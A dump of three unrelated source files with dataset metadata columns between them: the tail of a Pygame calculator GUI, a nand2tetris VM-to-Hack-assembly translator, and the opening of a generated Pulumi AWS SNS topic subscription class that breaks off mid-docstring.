border_size=self.border_size,
height=self.height)
def draw_converters_menu_gui(self):
"""Draw the converters menu."""
if self.active_button != 'temp_button':
self.temp_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Temperature")
elif self.active_button == 'temp_button':
self.temp_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Temperature")
# Factors menu.
def create_factors_menu_gui(self):
"""Create the buttons for the factors menu."""
self.get_factors_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=0.7)
self.common_factors_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=0.9)
self.gcf_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=1.1)
self.lcf_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=1.3)
def draw_factors_menu_gui(self):
"""Draw the factors menu."""
if self.active_button != 'get_factors_button':
self.get_factors_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Factoring")
elif self.active_button == 'get_factors_button':
self.get_factors_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Factoring")
if self.active_button != 'common_factors_button':
self.common_factors_button.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Common Factors")
elif self.active_button == 'common_factors_button':
self.common_factors_button.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Common Factors")
if self.active_button != 'gcf_button':
self.gcf_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="GCF")
elif self.active_button == 'gcf_button':
self.gcf_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="GCF")
if self.active_button != 'lcf_button':
self.lcf_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="LCF")
elif self.active_button == 'lcf_button':
self.lcf_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="LCF")
# Geometry menu.
def create_geometry_menu_gui(self):
"""Create the buttons for the geometry menu."""
self.mar_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=0.9)
self.solid_polygon_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=1.1)
def draw_geometry_menu_gui(self):
"""Draw the geometry menu."""
if self.active_button != 'mar_button':
self.mar_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Maintain Ratio")
elif self.active_button == 'mar_button':
self.mar_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Maintain Ratio")
if self.active_button != 'solid_polygon_button':
self.solid_polygon_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="2D Solid Info")
elif self.active_button == 'solid_polygon_button':
self.solid_polygon_button.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="2D Solid Info")
# Algebra menu.
def create_algebra_menu_gui(self):
"""Create the buttons for the algebra menu."""
self.root_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=0.9)
self.extrapolate_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=1.1)
def draw_algebra_menu_gui(self):
"""Draw the algebra menu."""
if self.active_button != 'root_button':
self.root_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Root")
elif self.active_button == 'root_button':
self.root_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Root")
if self.active_button != 'extrapolate_button':
self.extrapolate_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Extrapolate")
elif self.active_button == 'extrapolate_button':
self.extrapolate_button.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Extrapolate")
# Data processing menu.
def create_data_processing_menu_gui(self):
"""Create the buttons for the data processing menu."""
self.average_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=0.7)
self.median_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=0.9)
self.mode_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=1.1)
self.range_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=1.3)
def draw_data_processing_menu_gui(self):
"""Draw the data processing menu."""
if self.active_button != 'average_button':
self.average_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Mean/Average")
elif self.active_button == 'average_button':
self.average_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Mean/Average")
if self.active_button != 'median_button':
self.median_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Median")
elif self.active_button == 'median_button':
self.median_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Median")
if self.active_button != 'mode_button':
self.mode_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Mode")
elif self.active_button == 'mode_button':
self.mode_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Mode")
if self.active_button != 'range_button':
self.range_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Range")
elif self.active_button == 'range_button':
self.range_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Range")
# Redraw all screen elements.
def update_screen(self):
"""Update the screen."""
self.screen.fill((60,60,60))
for tile in self.tiles:
tile.draw()
if self.active_menu != 'main_menu':
if self.active_button != 'back_button':
self.back_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Back")
elif self.active_button == 'back_button':
self.back_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Back")
if (self.active_menu != 'factors_menu'
and self.active_menu != 'converters_menu'
and self.active_menu != 'geometry_menu'
and self.active_menu != 'algebra_menu'
and self.active_menu != 'data_processing_menu'):
if self.active_button != 'calculate_button':
self.calculate_button.draw(button_color=(30,220,30),
border_color=self.border_color,
text_color=self.text_color,
text="Calculate [ENTER]")
elif self.active_button == 'calculate_button':
self.calculate_button.draw(button_color=(20,140,20),
border_color=self.border_color,
text_color=self.text_color,
text="Calculate [ENTER]")
self.answer_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.answer,
text_x_add=self.answer_text_x_mod)
self.hover_text_help.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.hover_text)
if self.input_buttons == 1:
if self.active_button != 'input_button_4':
self.input_button_4.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_4)
elif self.active_button == 'input_button_4':
self.input_button_4.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_4)
elif self.input_buttons == 2:
if self.active_button != 'input_button_3':
self.input_button_3.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_3)
elif self.active_button == 'input_button_3':
self.input_button_3.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_3)
if self.active_button != 'input_button_5':
self.input_button_5.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_5)
elif self.active_button == 'input_button_5':
self.input_button_5.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_5)
elif self.input_buttons == 3:
if self.active_button != 'input_button_2':
self.input_button_2.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_2)
elif self.active_button == 'input_button_2':
self.input_button_2.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_2)
if self.active_button != 'input_button_4':
self.input_button_4.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_4)
elif self.active_button == 'input_button_4':
self.input_button_4.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_4)
if self.active_button != 'input_button_6':
self.input_button_6.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_6)
elif self.active_button == 'input_button_6':
self.input_button_6.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_6)
elif self.input_buttons == 4:
if self.active_button != 'input_button_1':
self.input_button_1.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_1)
elif self.active_button == 'input_button_1':
self.input_button_1.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_1)
if self.active_button != 'input_button_3':
self.input_button_3.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_3)
elif self.active_button == 'input_button_3':
self.input_button_3.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_3)
if self.active_button != 'input_button_5':
self.input_button_5.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_5)
elif self.active_button == 'input_button_5':
self.input_button_5.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_5)
if self.active_button != 'input_button_7':
self.input_button_7.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_7)
elif self.active_button == 'input_button_7':
self.input_button_7.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_7)
if self.active_menu == 'main_menu':
self.draw_main_menu_gui()
elif self.active_menu == 'converters_menu':
self.draw_converters_menu_gui()
elif self.active_menu == 'factors_menu':
self.draw_factors_menu_gui()
elif self.active_menu == 'geometry_menu':
self.draw_geometry_menu_gui()
elif self.active_menu == 'algebra_menu':
self.draw_algebra_menu_gui()
elif self.active_menu == 'data_processing_menu':
self.draw_data_processing_menu_gui()
pygame.display.flip()
if __name__ == '__main__':
    # Build the calculator GUI and enter its event loop.
    MathStuffGUI().run_program()
| 46.364138
| 177
| 0.522208
| 13,867
| 125,925
| 4.405279
| 0.020697
| 0.119778
| 0.101362
| 0.070227
| 0.933162
| 0.911701
| 0.882203
| 0.864311
| 0.835631
| 0.823304
| 0
| 0.018251
| 0.38866
| 125,925
| 2,715
| 178
| 46.381215
| 0.775275
| 0.023951
| 0
| 0.76752
| 0
| 0.000839
| 0.066874
| 0.006033
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015107
| false
| 0.000839
| 0.001679
| 0
| 0.018884
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6324cb2187a53dcb5243d8f01f07a5ca3641c6b3
| 12,140
|
py
|
Python
|
projects/07/code_writer.py
|
Youngermaster/Nand2Tetris-Solutions
|
9fb4ac31a0558bcc2324696bfb451aac11232088
|
[
"MIT"
] | null | null | null |
projects/07/code_writer.py
|
Youngermaster/Nand2Tetris-Solutions
|
9fb4ac31a0558bcc2324696bfb451aac11232088
|
[
"MIT"
] | null | null | null |
projects/07/code_writer.py
|
Youngermaster/Nand2Tetris-Solutions
|
9fb4ac31a0558bcc2324696bfb451aac11232088
|
[
"MIT"
] | null | null | null |
from parser import Parser
class CodeWriter:
    """Translate parsed VM commands into Hack assembly (nand2tetris project 7).

    Translates ``<dir>/<name>.vm`` into ``<dir>/<name>.asm``.  The output
    file handle stays open until :meth:`createOutput` finishes and closes it.
    """

    # Memory segments reached through a base.  Pointer-backed segments add
    # the index to the register's *contents* (M); fixed-base segments
    # (temp -> RAM[5], pointer -> RAM[3]) add the index to the address
    # itself (A).
    _SEGMENTS = {
        'local': ('@LCL', 'M'),
        'argument': ('@ARG', 'M'),
        'this': ('@THIS', 'M'),
        'that': ('@THAT', 'M'),
        'temp': ('@5', 'A'),
        'pointer': ('@3', 'A'),
    }
    # Jump mnemonic used by each comparison command.
    _COMPARISONS = {'eq': 'JEQ', 'gt': 'JGT', 'lt': 'JLT'}
    # Tail instructions for each binary op, run once D holds y and A points
    # at x (the value below it on the stack).
    _BINARY_OPS = {
        'add': ('D=D+M', 'M=D'),
        'sub': ('D=M-D', 'M=D'),
        'and': ('M=D&M',),
        'or': ('M=D|M',),
    }
    # In-place rewrite of the value on top of the stack.
    _UNARY_OPS = {'neg': 'M=-M', 'not': 'M=!M'}

    def __init__(self, path):
        """Parse *path* (a ``.vm`` file) and open the matching ``.asm`` output.

        Performs the logic of the recommended ``setFileName`` constructor here.
        NOTE(review): assumes *path* contains at least one '/' and a '.' --
        confirm against how callers build paths.
        """
        self.parser = Parser(path)
        ind1 = path.find('/')
        ind2 = path.find('.')
        self.writefile = path[:ind1] + "/" + path[ind1+1:ind2]
        self.filename = self.writefile + '.asm'
        self.file = open(self.filename, 'w')
        self.writefile_ind = self.writefile.rfind('/')
        # Basename of the output file; used to declare static variables as
        # unique '<file>.<index>' assembly symbols.
        self.static_var = self.writefile[self.writefile_ind + 1:]

    def _emit(self, *instructions):
        """Write each Hack instruction on its own line."""
        for instruction in instructions:
            self.file.write(instruction + '\n')

    def writePushPop(self):  # no need to pass in command as an argument
        """Emit assembly for the current C_PUSH or C_POP command."""
        assert self.parser.commandType() in ['C_PUSH', 'C_POP']
        arg1 = self.parser.arg1()
        arg2 = self.parser.arg2()
        if self.parser.commandType() == 'C_PUSH':
            self._write_push(arg1, arg2)
        else:
            self._write_pop(arg1, arg2)

    def _write_push(self, segment, index):
        """Emit 'push segment index': load the value into D, then push D."""
        if segment == 'constant':
            self._emit('@%s' % index, 'D=A',
                       '@SP', 'A=M', 'M=D')
        elif segment in self._SEGMENTS:
            base, register = self._SEGMENTS[segment]
            self._emit('@%s' % index, 'D=A',
                       base, 'A=D+%s' % register, 'D=M',
                       '@SP', 'A=M', 'M=D')
        elif segment == 'static':
            # 'push static j' reads the declared symbol '<file>.j'.
            self._emit('@%s.%s' % (self.static_var, index), 'D=M',
                       '@SP', 'A=M', 'M=D')
        else:
            pass  # TODO: unsupported segment -- silently ignored for now
        # Grow the stack: M[SP] += 1 (emitted even on the TODO branch,
        # matching the previous behavior).
        self._emit('@SP', 'M=M+1')

    def _write_pop(self, segment, index):
        """Emit 'pop segment index': store the popped value at segment[index]."""
        # D <- index (also emitted before the static/unknown branches,
        # matching the previous behavior).
        self._emit('@%s' % index, 'D=A')
        if segment in self._SEGMENTS:
            base, register = self._SEGMENTS[segment]
            # Use general-purpose RAM[13] to hold 'segment base + index'.
            self._emit(base, 'D=D+%s' % register,
                       '@13', 'M=D',
                       '@SP', 'A=M-1', 'D=M',   # D <- top of stack
                       '@13', 'A=M', 'M=D',     # write to the saved address
                       '@SP', 'M=M-1')          # shrink the stack
        elif segment == 'static':
            self._emit('@SP', 'A=M-1', 'D=M',
                       '@%s.%s' % (self.static_var, index), 'M=D',
                       '@SP', 'M=M-1')
        else:
            pass  # TODO: unsupported segment

    def writeArithmetic(self):  # no need to pass in command as an argument
        """Emit assembly for the current C_ARITHMETIC command.

        Raises:
            ValueError: if the parsed command is not a known arithmetic op.
        """
        assert self.parser.commandType() == 'C_ARITHMETIC'
        command = self.parser.arg1()
        if command in self._BINARY_OPS:
            # D <- y, A -> x, apply the op in place, then shrink the stack.
            self._emit('@SP', 'A=M-1', 'D=M', 'A=A-1')
            self._emit(*self._BINARY_OPS[command])
            self._emit('@SP', 'M=M-1')
        elif command in self._COMPARISONS:
            self._write_comparison(self._COMPARISONS[command])
        elif command in self._UNARY_OPS:
            self._emit('@SP', 'A=M-1', self._UNARY_OPS[command])
        else:
            raise ValueError(
                "Unrecognized command for C_ARITHMETIC command type")

    def _write_comparison(self, jump):
        """Emit x-vs-y compare; leaves -1 (true) or 0 (false) on the stack.

        Labels embed the parser's command counter because there can be more
        than one comparison command per file.
        """
        i = self.parser.i
        self._emit('@SP', 'A=M-1', 'D=M', 'A=A-1', 'D=M-D',
                   '@IF_TRUE_%s' % i, 'D;%s' % jump,
                   '@SP', 'A=M-1', 'A=A-1', 'M=0',
                   '@END_%s' % i, '0;JMP',
                   '(IF_TRUE_%s)' % i,
                   '@SP', 'A=M-1', 'A=A-1', 'M=-1',
                   '(END_%s)' % i,
                   '@SP', 'M=M-1')

    def createOutput(self):
        """Translate every command in the input file, then close the output."""
        # Bootstrap: point SP and the segment registers at the addresses
        # expected by the course's test scripts (SP=256, LCL=300, ARG=400,
        # THIS=3000, THAT=3010).
        for address, register in (('256', 'SP'), ('300', 'LCL'),
                                  ('400', 'ARG'), ('3000', 'THIS'),
                                  ('3010', 'THAT')):
            self._emit('@%s' % address, 'D=A', '@%s' % register, 'M=D')
        self.parser.i = -1
        while self.parser.hasMoreCommands():
            self.parser.advance()
            c_type = self.parser.commandType()
            if c_type in ['C_PUSH', 'C_POP']:
                self.writePushPop()
            elif c_type == 'C_ARITHMETIC':
                self.writeArithmetic()
        # close file
        self.file.close()
if __name__ == "__main__":
    # Translate each of the course's sample VM programs into Hack assembly.
    sample_programs = (
        "StackArithmetic/SimpleAdd/SimpleAdd.vm",
        "StackArithmetic/StackTest/StackTest.vm",
        "MemoryAccess/BasicTest/BasicTest.vm",
        "MemoryAccess/PointerTest/PointerTest.vm",
        "MemoryAccess/StaticTest/StaticTest.vm",
    )
    for vm_path in sample_programs:
        CodeWriter(vm_path).createOutput()
| 39.415584
| 100
| 0.469934
| 1,651
| 12,140
| 3.423985
| 0.09146
| 0.258978
| 0.416239
| 0.289758
| 0.720502
| 0.709181
| 0.70865
| 0.70865
| 0.68813
| 0.672209
| 0
| 0.017004
| 0.360544
| 12,140
| 307
| 101
| 39.543974
| 0.711194
| 0.109473
| 0
| 0.735178
| 0
| 0
| 0.150687
| 0.017373
| 0
| 0
| 0
| 0.003257
| 0.007905
| 1
| 0.01581
| false
| 0.01581
| 0.003953
| 0
| 0.023715
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
632d627a4bcd3708d72cd96783ba50edc3b46e8f
| 44,082
|
py
|
Python
|
sdk/python/pulumi_aws/sns/topic_subscription.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/sns/topic_subscription.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/sns/topic_subscription.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['TopicSubscriptionArgs', 'TopicSubscription']
@pulumi.input_type
class TopicSubscriptionArgs:
    """The set of input arguments accepted when constructing a
    ``TopicSubscription`` resource.

    NOTE(review): this file is generated by the Pulumi Terraform Bridge
    (see the file header); keep hand edits to comments/docstrings only so
    a regeneration diff stays small.
    """
    def __init__(__self__, *,
                 endpoint: pulumi.Input[str],
                 protocol: pulumi.Input[str],
                 topic: pulumi.Input[str],
                 confirmation_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
                 delivery_policy: Optional[pulumi.Input[str]] = None,
                 endpoint_auto_confirms: Optional[pulumi.Input[bool]] = None,
                 filter_policy: Optional[pulumi.Input[str]] = None,
                 raw_message_delivery: Optional[pulumi.Input[bool]] = None,
                 redrive_policy: Optional[pulumi.Input[str]] = None,
                 subscription_role_arn: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a TopicSubscription resource.
        :param pulumi.Input[str] endpoint: Endpoint to send data to. The contents vary with the protocol. See details below.
        :param pulumi.Input[str] protocol: Protocol to use. Valid values are: `sqs`, `sms`, `lambda`, `firehose`, and `application`. Protocols `email`, `email-json`, `http` and `https` are also valid but partially supported. See details below.
        :param pulumi.Input[str] topic: ARN of the SNS topic to subscribe to.
        :param pulumi.Input[int] confirmation_timeout_in_minutes: Integer indicating number of minutes to wait in retrying mode for fetching subscription arn before marking it as failure. Only applicable for http and https protocols. Default is `1`.
        :param pulumi.Input[str] delivery_policy: JSON String with the delivery policy (retries, backoff, etc.) that will be used in the subscription - this only applies to HTTP/S subscriptions. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/DeliveryPolicies.html) for more details.
        :param pulumi.Input[bool] endpoint_auto_confirms: Whether the endpoint is capable of [auto confirming subscription](http://docs.aws.amazon.com/sns/latest/dg/SendMessageToHttp.html#SendMessageToHttp.prepare) (e.g., PagerDuty). Default is `false`.
        :param pulumi.Input[str] filter_policy: JSON String with the filter policy that will be used in the subscription to filter messages seen by the target resource. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/message-filtering.html) for more details.
        :param pulumi.Input[bool] raw_message_delivery: Whether to enable raw message delivery (the original message is directly passed, not wrapped in JSON with the original message in the message property). Default is `false`.
        :param pulumi.Input[str] redrive_policy: JSON String with the redrive policy that will be used in the subscription. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-dead-letter-queues.html#how-messages-moved-into-dead-letter-queue) for more details.
        :param pulumi.Input[str] subscription_role_arn: ARN of the IAM role to publish to Kinesis Data Firehose delivery stream. Refer to [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-firehose-as-subscriber.html).
        """
        pulumi.set(__self__, "endpoint", endpoint)
        pulumi.set(__self__, "protocol", protocol)
        pulumi.set(__self__, "topic", topic)
        # Optional arguments are only recorded when supplied, so absent keys
        # fall back to the provider's defaults.
        if confirmation_timeout_in_minutes is not None:
            pulumi.set(__self__, "confirmation_timeout_in_minutes", confirmation_timeout_in_minutes)
        if delivery_policy is not None:
            pulumi.set(__self__, "delivery_policy", delivery_policy)
        if endpoint_auto_confirms is not None:
            pulumi.set(__self__, "endpoint_auto_confirms", endpoint_auto_confirms)
        if filter_policy is not None:
            pulumi.set(__self__, "filter_policy", filter_policy)
        if raw_message_delivery is not None:
            pulumi.set(__self__, "raw_message_delivery", raw_message_delivery)
        if redrive_policy is not None:
            pulumi.set(__self__, "redrive_policy", redrive_policy)
        if subscription_role_arn is not None:
            pulumi.set(__self__, "subscription_role_arn", subscription_role_arn)
    @property
    @pulumi.getter
    def endpoint(self) -> pulumi.Input[str]:
        """
        Endpoint to send data to. The contents vary with the protocol. See details below.
        """
        return pulumi.get(self, "endpoint")
    @endpoint.setter
    def endpoint(self, value: pulumi.Input[str]):
        pulumi.set(self, "endpoint", value)
    @property
    @pulumi.getter
    def protocol(self) -> pulumi.Input[str]:
        """
        Protocol to use. Valid values are: `sqs`, `sms`, `lambda`, `firehose`, and `application`. Protocols `email`, `email-json`, `http` and `https` are also valid but partially supported. See details below.
        """
        return pulumi.get(self, "protocol")
    @protocol.setter
    def protocol(self, value: pulumi.Input[str]):
        pulumi.set(self, "protocol", value)
    @property
    @pulumi.getter
    def topic(self) -> pulumi.Input[str]:
        """
        ARN of the SNS topic to subscribe to.
        """
        return pulumi.get(self, "topic")
    @topic.setter
    def topic(self, value: pulumi.Input[str]):
        pulumi.set(self, "topic", value)
    @property
    @pulumi.getter(name="confirmationTimeoutInMinutes")
    def confirmation_timeout_in_minutes(self) -> Optional[pulumi.Input[int]]:
        """
        Integer indicating number of minutes to wait in retrying mode for fetching subscription arn before marking it as failure. Only applicable for http and https protocols. Default is `1`.
        """
        return pulumi.get(self, "confirmation_timeout_in_minutes")
    @confirmation_timeout_in_minutes.setter
    def confirmation_timeout_in_minutes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "confirmation_timeout_in_minutes", value)
    @property
    @pulumi.getter(name="deliveryPolicy")
    def delivery_policy(self) -> Optional[pulumi.Input[str]]:
        """
        JSON String with the delivery policy (retries, backoff, etc.) that will be used in the subscription - this only applies to HTTP/S subscriptions. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/DeliveryPolicies.html) for more details.
        """
        return pulumi.get(self, "delivery_policy")
    @delivery_policy.setter
    def delivery_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "delivery_policy", value)
    @property
    @pulumi.getter(name="endpointAutoConfirms")
    def endpoint_auto_confirms(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether the endpoint is capable of [auto confirming subscription](http://docs.aws.amazon.com/sns/latest/dg/SendMessageToHttp.html#SendMessageToHttp.prepare) (e.g., PagerDuty). Default is `false`.
        """
        return pulumi.get(self, "endpoint_auto_confirms")
    @endpoint_auto_confirms.setter
    def endpoint_auto_confirms(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "endpoint_auto_confirms", value)
    @property
    @pulumi.getter(name="filterPolicy")
    def filter_policy(self) -> Optional[pulumi.Input[str]]:
        """
        JSON String with the filter policy that will be used in the subscription to filter messages seen by the target resource. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/message-filtering.html) for more details.
        """
        return pulumi.get(self, "filter_policy")
    @filter_policy.setter
    def filter_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "filter_policy", value)
    @property
    @pulumi.getter(name="rawMessageDelivery")
    def raw_message_delivery(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether to enable raw message delivery (the original message is directly passed, not wrapped in JSON with the original message in the message property). Default is `false`.
        """
        return pulumi.get(self, "raw_message_delivery")
    @raw_message_delivery.setter
    def raw_message_delivery(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "raw_message_delivery", value)
    @property
    @pulumi.getter(name="redrivePolicy")
    def redrive_policy(self) -> Optional[pulumi.Input[str]]:
        """
        JSON String with the redrive policy that will be used in the subscription. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-dead-letter-queues.html#how-messages-moved-into-dead-letter-queue) for more details.
        """
        return pulumi.get(self, "redrive_policy")
    @redrive_policy.setter
    def redrive_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "redrive_policy", value)
    @property
    @pulumi.getter(name="subscriptionRoleArn")
    def subscription_role_arn(self) -> Optional[pulumi.Input[str]]:
        """
        ARN of the IAM role to publish to Kinesis Data Firehose delivery stream. Refer to [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/sns-firehose-as-subscriber.html).
        """
        return pulumi.get(self, "subscription_role_arn")
    @subscription_role_arn.setter
    def subscription_role_arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subscription_role_arn", value)
@pulumi.input_type
class _TopicSubscriptionState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
confirmation_timeout_in_minutes: Optional[pulumi.Input[int]] = None,
confirmation_was_authenticated: Optional[pulumi.Input[bool]] = None,
delivery_policy: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
endpoint_auto_confirms: Optional[pulumi.Input[bool]] = None,
filter_policy: Optional[pulumi.Input[str]] = None,
owner_id: Optional[pulumi.Input[str]] = None,
pending_confirmation: Optional[pulumi.Input[bool]] = None,
protocol: Optional[pulumi.Input[str]] = None,
raw_message_delivery: Optional[pulumi.Input[bool]] = None,
redrive_policy: Optional[pulumi.Input[str]] = None,
subscription_role_arn: Optional[pulumi.Input[str]] = None,
topic: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering TopicSubscription resources.
:param pulumi.Input[str] arn: ARN of the subscription.
:param pulumi.Input[int] confirmation_timeout_in_minutes: Integer indicating number of minutes to wait in retrying mode for fetching subscription arn before marking it as failure. Only applicable for http and https protocols. Default is `1`.
:param pulumi.Input[bool] confirmation_was_authenticated: Whether the subscription confirmation request was authenticated.
:param pulumi.Input[str] delivery_policy: JSON String with the delivery policy (retries, backoff, etc.) that will be used in the subscription - this only applies to HTTP/S subscriptions. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/DeliveryPolicies.html) for more details.
:param pulumi.Input[str] endpoint: Endpoint to send data to. The contents vary with the protocol. See details below.
:param pulumi.Input[bool] endpoint_auto_confirms: Whether the endpoint is capable of [auto confirming subscription](http://docs.aws.amazon.com/sns/latest/dg/SendMessageToHttp.html#SendMessageToHttp.prepare) (e.g., PagerDuty). Default is `false`.
:param pulumi.Input[str] filter_policy: JSON String with the filter policy that will be used in the subscription to filter messages seen by the target resource. Refer to the [SNS docs](https://docs.aws.amazon.com/sns/latest/dg/message-filtering.html) for more details.
